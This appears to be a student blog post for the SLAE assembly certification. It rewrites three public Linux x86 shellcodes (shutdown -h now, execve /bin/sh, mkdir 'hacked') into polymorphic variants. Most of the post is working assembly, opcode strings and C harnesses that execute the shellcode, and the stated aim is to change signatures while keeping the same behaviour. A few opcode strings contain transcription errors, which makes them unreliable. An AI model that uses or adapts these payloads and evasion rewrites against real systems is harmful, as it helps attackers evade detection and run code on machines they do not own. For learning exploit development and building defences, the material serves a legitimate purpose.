Comment on page
0x06 SLAE - Polymorphic versions
shellcode-876.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
_start:
xor eax,eax
xor edx,edx
push eax
push 0x682d
mov edi,esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi,esp
push eax
push 0x6e776f64
push 0x74756873
push 0x2f2f2f6e
push 0x6962732f
mov ebx,esp
push edx
push esi
push edi
push ebx
mov ecx,esp
mov al,0xb
int 0x80
The original shellcode has 56 bytes. The file can be accessed here http://shell-storm.org/shellcode/files/shellcode-876.php
shellcode-876-poly.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes
global _start
_start:
cdq
mul edx
push word 0x682d
mov edi, esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi, esp
push eax
mov dword [esp-4], 0x6e776f64
mov dword [esp-8], 0x74756873
mov dword [esp-12], 0x2f2f2f6e
mov dword [esp-16], 0x6962732f
sub esp, 16
mov ebx, esp
push edx
push esi
push edi
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
Has we can see on the following block of code below, there is some modification of the assembly which give a different shellcode but give the same result. The modified versions have 69 bytes. So, this is less than the 150% of the original shellcode. The maximum allowed for the assignment of this sample is 84 bytes.
The shellcode is :
\x99\xf7\xe2\x66\x68\x2d\x68\x89\xe7\x50\x6a\x6e\x66\xc7\x44\x24\x01\x6f\x77\x89
\xe7\x50xc7\x44\x24\xfc\x64\x6f\x77\x6e\xc7\x44\x24\xf8\x73\x68\x75\x74\xc7\x44\
x24\xf4\x6e\x2f\x2f\x2f\xc7\x44\x24\xf0\x2f\x73\x62\x69\x83\xec\x10\x89\xe3\x52\
x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
Here is also a simple demo of the shellcode generation and execution.
/*
Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
Date : 10 Feb 2011
Author : kernel_panik
Thanks : cOokie, agix, antrhacks
*/
/*
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f ;; hs//
push 0x6e69622f ;; nib/
mov ebx, esp
mov al, 11
int 0x80
*/
#include <stdio.h>
#include <string.h>
char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf ("Shellcode length : %d bytes\n", strlen (code));
int(*f)()=(int(*)())code;
f();
}
The original shellcode have 21 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-752.php
; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes
global _start
_start:
xor eax, eax
xor ecx, ecx
push eax
mov dword [esp-4], 0x68732f2f
mov dword [esp-8], 0x6e69622f
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
The polymorphic version have 30 bytes which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there is less possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.
Here is the shellcode:
\x31\xc0\x31\xc9\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80
/*
* This shellcode will do a mkdir() of 'hacked' and then an exit()
* Written by [email protected]
*
*/
char shellcode[]=
"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
"\x61\x63\x6b\x65\x64\x23";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
The sample can be accessed from shell storm: http://shell-storm.org/shellcode/files/shellcode-542.php
The author only gave the shellcode. So, for the purpose of the SLAE, we will get the assembly of that shellcode for better understanding and be able to create a polymorphic version of it.
echo -ne "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23" >shellcode542ndisasm -b32 shellcode54200000000 EB16 jmp short 0x18
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 884606 mov [esi+0x6],al
00000008 B027 mov al,0x27
0000000A 8D1E lea ebx,[esi]
0000000C 66B9ED01 mov cx,0x1ed
00000010 CD80 int 0x80
00000012 B001 mov al,0x1
00000014 31DB xor ebx,ebx
00000016 CD80 int 0x80
00000018 E8E5FFFFFF call 0x2
0000001D 6861636B65 push dword 0x656b6361
00000022 64 fs
00000023 23 db 0x23
The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.
I realized that a lot of the assembly in the original one can be modified to do a different version of it. Let's keep it simple. Basically, the shellcode will create a mkdir folder with the name "hacked" with the right 775.
My final assembly polymorphic shellcode is pretty different but does the same thing.
; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes
global _start
_start:
xor eax,eax
push eax
;sys mkdir
mov al,0x27
; push ./hacked
push 0x64656b63
push 0x61682f2e
mov ebx,esp
; push 777 which equal to 0x1ff in octal
mov cx, 0x1ff
int 0x80
;sys exit
push 0x1
pop eax
int 0x80
\x31\xc0\x50\xb0\x27\x68\x63\x6b\x65\x64\x68\x2e\x2f\x68\x61\x89\xe3\x66\xb9\xff\x01\xcd\x80\x6a\x01\x58\xcd\x80
The polymorphic version have 28 bytes. So, it's smaller then the original one which is great.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification
Student ID: SLAE-1374
Last modified 3yr ago